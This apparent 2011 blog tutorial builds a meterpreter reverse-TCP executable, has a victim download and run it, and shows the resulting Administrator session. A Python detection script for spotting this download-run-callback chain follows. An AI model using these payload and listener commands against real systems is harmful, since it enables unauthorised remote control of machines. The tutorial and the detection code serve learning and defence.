Saturday, March 5, 2011

Simple meterpreter call back payload

The following commands build a binary that contains a meterpreter payload. When the target system runs the binary, it connects back to the listener and opens a meterpreter session.

msfpayload windows/meterpreter/reverse_tcp LHOST= X > /var/www/rawr.exe

What's happening here? First, we generate the actual payload that the victim will execute. Note: we are not exploiting any vulnerability here; this binary simply contains the meterpreter reverse TCP connect payload (windows/meterpreter/reverse_tcp). You have to set LHOST to the actual listening box (I know, counterintuitive). X is the shortcut to "exploit" in metasploit. Normally msfpayload writes the binary contents to stdout so you can redirect them wherever you want; here I just redirect them to rawr.exe in my web root directory so I can download it via a web browser.

What happens now (once I start apache) is that I go to the victim machine and type "" in order to download it. Once it is downloaded, I run it.
You need to run the following command before you run the Windows binary (otherwise it will connect to nothing and you will have to re-execute the binary):

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= E

This command starts metasploit with the given arguments as its settings. msf starts the multi handler to listen for the connection; the rest of the arguments are the same as in the msfpayload command. *Now run the Windows payload.*

You should then get this:

root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= E
[*] Please wait while we load the module tree...

| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/

=[ metasploit v3.6.0-beta [core:3.6 api:1.0]
+ -- --=[ 647 exploits - 340 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11879 updated today (2011.03.05)

PAYLOAD => windows/meterpreter/reverse_tcp
[*] Started reverse handler on
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to
[*] Meterpreter session 1 opened ( -> at Sat Mar 05 02:22:40 -0500 2011

meterpreter > getuid
Server username: WINXP\Administrator
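Seen from the defending side, the sequence above (a browser saves an .exe, the .exe is run, and it immediately opens an outbound TCP connection) is a chain that endpoint telemetry can correlate. The following is an added example, not part of the original post: the event tuples are constructed, simplified Sysmon-style records, and the browser list and 10-minute window are assumptions.

```python
from datetime import datetime, timedelta
from ntpath import basename

BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}  # assumed browser list
WINDOW = timedelta(minutes=10)  # assumed correlation window

# Constructed sample events (not from the post), simplified Sysmon-style:
# (event id, time, image, detail); 11 = file create, 1 = process create,
# 3 = network connect. Addresses are documentation-range placeholders.
EVENTS = [
    (11, "02:21:10", r"C:\Program Files\Internet Explorer\iexplore.exe", r"C:\Temp\rawr.exe"),
    (1,  "02:22:38", r"C:\Temp\rawr.exe", ""),
    (3,  "02:22:40", r"C:\Temp\rawr.exe", "192.0.2.10:4444"),
    (11, "02:30:00", r"C:\Program Files\Internet Explorer\iexplore.exe", r"C:\Temp\setup.exe"),
    (1,  "02:31:00", r"C:\Temp\setup.exe", ""),
    (3,  "02:40:00", r"C:\WINDOWS\system32\svchost.exe", "198.51.100.7:80"),
]

def parse(ts):
    return datetime.strptime(ts, "%H:%M:%S")

def find_callbacks(events):
    """Return (image, destination) for browser-dropped .exe files that were
    executed and then opened an outbound connection within WINDOW."""
    dropped = {}  # lower-cased path -> time the browser wrote the file
    started = {}  # lower-cased path -> time the file was executed
    alerts = []
    for eid, ts, image, detail in sorted(events, key=lambda e: parse(e[1])):
        when, img = parse(ts), image.lower()
        if eid == 11 and basename(img) in BROWSERS and detail.lower().endswith(".exe"):
            dropped[detail.lower()] = when
        elif eid == 1 and img in dropped:
            started[img] = when
        elif eid == 3 and img in started and when - started[img] <= WINDOW:
            alerts.append((image, detail))
    return alerts

if __name__ == "__main__":
    for image, dest in find_callbacks(EVENTS):
        print(f"ALERT: browser-downloaded {image} connected out to {dest}")
```

The benign download (setup.exe) is executed but never connects out, and the svchost.exe connection has no browser-dropped origin, so neither is flagged.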
